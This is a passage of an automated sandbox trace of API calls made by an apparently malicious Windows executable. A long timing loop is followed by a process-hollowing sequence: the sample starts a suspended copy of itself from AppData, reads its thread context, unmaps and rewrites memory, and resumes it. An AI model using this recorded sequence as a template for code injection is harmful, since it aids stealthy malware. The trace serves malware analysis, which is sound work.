(dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.894] SetLastError (dwErrCode=0x0) [0148.894] GetTickCount () returned 0x1d49ca5 [0148.897] SetLastError (dwErrCode=0x0) [0148.897] GetTickCount () returned 0x1d49cb5 [0148.897] SetLastError (dwErrCode=0x0) [0148.897] GetTickCount () returned 0x1d49cb5 [0148.897] SetLastError (dwErrCode=0x0) [0148.897] GetTickCount () returned 0x1d49cb5 [0148.897] SetLastError (dwErrCode=0x0) [0148.897] GetTickCount () returned 0x1d49cb5 [0148.897] SetLastError (dwErrCode=0x0) [0148.897] GetTickCount () returned 0x1d49cb5 [0148.897] SetLastError (dwErrCode=0x0) [0148.897] GetTickCount () returned 0x1d49cb5 [0148.897] SetLastError (dwErrCode=0x0) [0148.897] GetTickCount () returned 0x1d49cb5 [0148.897] SetLastError (dwErrCode=0x0) [0148.897] GetTickCount () returned 0x1d49cb5 [0148.897] SetLastError (dwErrCode=0x0) [0148.897] GetTickCount () returned 0x1d49cb5 [0148.897] SetLastError (dwErrCode=0x0) [0148.897] GetTickCount () returned 0x1d49cb5 [0148.897] SetLastError (dwErrCode=0x0) [0148.897] GetTickCount () returned 0x1d49cb5 [0148.897] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.898] SetLastError (dwErrCode=0x0) [0148.898] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.899] SetLastError (dwErrCode=0x0) [0148.899] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.900] SetLastError (dwErrCode=0x0) [0148.900] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.901] SetLastError (dwErrCode=0x0) [0148.901] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.902] SetLastError (dwErrCode=0x0) [0148.902] GetTickCount () returned 0x1d49cb5 [0148.903] SetLastError (dwErrCode=0x0) [0148.944] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0148.945] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalAlloc") returned 0x769c5846 [0148.945] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0148.945] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0148.945] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0148.945] GetProcAddress (hModule=0x769b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x769e7327 [0148.945] GetProcAddress (hModule=0x769b0000, lpProcName="Module32First") returned 0x76a46279 [0148.945] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0148.945] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x30 [0148.948] Module32First (hSnapshot=0x30, lpme=0x18c36c) returned 1 [0148.948] VirtualAlloc (lpAddress=0x0, dwSize=0x89a0, flAllocationType=0x1000, flProtect=0x40) returned 0x20000 [0148.952] LoadLibraryA (lpLibFileName="user32") returned 0x773b0000 [0149.143] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0149.143] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageExtraInfo") returned 0x773eed76 [0149.143] LoadLibraryA (lpLibFileName="kernel32") returned 0x769b0000 [0149.143] GetProcAddress (hModule=0x769b0000, lpProcName="WinExec") returned 0x76a43051 [0149.143] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0149.143] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0149.143] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0149.144] GetProcAddress (hModule=0x769b0000, lpProcName="CreateProcessA") returned 0x769c1072 [0149.144] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadContext") returned 0x769e799c [0149.144] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0149.144] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAllocEx") returned 0x769dd980 [0149.144] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0149.144] GetProcAddress (hModule=0x769b0000, lpProcName="ReadProcessMemory") returned 0x769dcfa4 [0149.144] GetProcAddress (hModule=0x769b0000, lpProcName="WriteProcessMemory") returned 0x769dd9b0 [0149.144] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadContext") returned 0x76a45933 [0149.144] GetProcAddress (hModule=0x769b0000, lpProcName="ResumeThread") returned 0x769c43a7 [0149.222] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForSingleObject") returned 0x769c1136 [0149.222] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0149.223] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0149.223] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x779e0000 [0149.223] GetProcAddress (hModule=0x779e0000, lpProcName="NtUnmapViewOfSection") returned 0x779ffc70 [0149.224] GetProcAddress (hModule=0x779e0000, lpProcName="NtWriteVirtualMemory") returned 0x779ffe04 [0149.224] GetProcAddress (hModule=0x773b0000, lpProcName="RegisterClassExA") returned 0x773cdb98 [0149.224] GetProcAddress (hModule=0x773b0000, lpProcName="CreateWindowExA") returned 0x773cd22e [0149.224] GetProcAddress (hModule=0x773b0000, lpProcName="PostMessageA") returned 0x773d3baa [0149.224] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageA") returned 0x773c7bd3 [0149.224] GetProcAddress (hModule=0x773b0000, lpProcName="DefWindowProcA") returned 0x77a224e0 [0149.224] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileAttributesA") returned 0x769c53cc [0149.224] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoA") returned 0x769c0e00 [0149.224] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtectEx") returned 0x76a44b5f [0149.224] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0149.224] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0149.225] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0149.225] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0149.225] RegisterClassExA (param_1=0x18c028) returned 0x34c107 [0149.226] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x201e4 [0149.259] PostMessageA (hWnd=0x201e4, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0149.260] GetMessageA (in: lpMsg=0x18c058, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18c058) returned 1 [0149.260] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0149.260] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x220000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0x2a [0149.260] GetStartupInfoA (in: lpStartupInfo=0x18bf7c | out: lpStartupInfo=0x18bf7c*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0149.260] GetCommandLineA () returned="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr " [0149.260] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr", lpCommandLine="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18bf7c*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18bfd4 | out: lpCommandLine="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr ", lpProcessInformation=0x18bfd4*(hProcess=0x78, hThread=0x74, dwProcessId=0xed8, dwThreadId=0xedc)) returned 1 [0149.274] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.274] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0149.275] GetThreadContext (in: hThread=0x74, lpContext=0x220000 | out: lpContext=0x220000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x423db0, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, 